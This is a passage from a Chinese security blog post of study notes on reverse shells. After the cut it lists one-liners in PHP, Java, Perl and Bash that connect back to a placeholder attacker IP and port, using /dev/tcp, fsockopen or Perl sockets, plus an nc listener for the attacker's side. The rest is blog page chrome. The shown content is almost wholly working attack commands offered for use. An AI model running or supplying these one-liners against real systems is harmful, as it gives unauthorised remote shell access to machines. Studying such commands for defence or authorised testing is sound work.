<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php -r &#39;exec(&quot;&#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;攻击者ip&#x2F;监听端口&quot;)&#39;</span><br><span class="line">php -r &#39;$sock&#x3D;fsockopen(&quot;ip&quot;,port);exec(&quot;&#x2F;bin&#x2F;bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br></pre></td></tr></table></figure>
</li>
<li><p>java脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">r &#x3D; Runtime.getRuntime()</span><br><span class="line">p &#x3D; r.exec([&quot;&#x2F;bin&#x2F;bash&quot;,&quot;-c&quot;,&quot;exec 5&lt;&gt;&#x2F;dev&#x2F;tcp&#x2F;ip&#x2F;port;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done&quot;] as String[])</span><br><span class="line">p.waitFor()</span><br></pre></td></tr></table></figure>
</li>
<li><p>perl脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e &#39;use Socket;$i&#x3D;&quot;ip&quot;;$p&#x3D;port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;&#x2F;bin&#x2F;sh -i&quot;);&#125;;&#39;</span><br></pre></td></tr></table></figure>
</li>
<li><p>对于以上的脚本里的ip，port参数，都是攻击机的ip以及使用监听的port参数：<code>nc -nlvp port</code></p>
</li>
</ul>
<h3 id="5-bash"><a href="#5-bash" class="headerlink" title="5.bash"></a>5.bash</h3><ul>
<li>攻击机监听:<code>nc -nlvp port</code></li>
<li>目标机Linux上:<code>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</code></li>
</ul>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://yoursite.com/2020/03/23/%E5%8F%8D%E5%BC%B9shell/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag">学习笔记</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
    
      <a href="/2020/03/23/%E6%8F%90%E6%9D%83%E4%B8%8E%E5%90%8E%E9%97%A8%E7%BB%B4%E6%8C%81/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">提权与后门维持</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: 'false',
        verify: 'false',
        avatar: 'mp',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2020
        w
      </li>
      <li>
        
        Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="to_top">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>
      </div>
    </main>
    <aside class="sidebar">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/logo.png" alt="w&#39; Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>在?请我喝杯咖啡?</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay1.png">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat2.png">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/share.js"></script>


<script src="/js/lazyload.min.js"></script>


<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['面朝大海,春暖花开', '春赏百花冬观雪', '今晚的月色真美'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
  }

</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    onClick: (e) => {
      $('.toc-link').removeClass('is-active-link');
      $(`a[href=${e.target.hash}]`).addClass('is-active-link');
      $(e.target.hash).scrollIntoView();
      return false;
    }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/js/ayer.js"></script>



<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>




<script src="/js/busuanzi-2.3.pure.min.js"></script>



<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.2/dist/jquery.fancybox.min.css">
<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.2/dist/jquery.fancybox.min.js"></script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=448738638&auto=1&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
</body>

</html>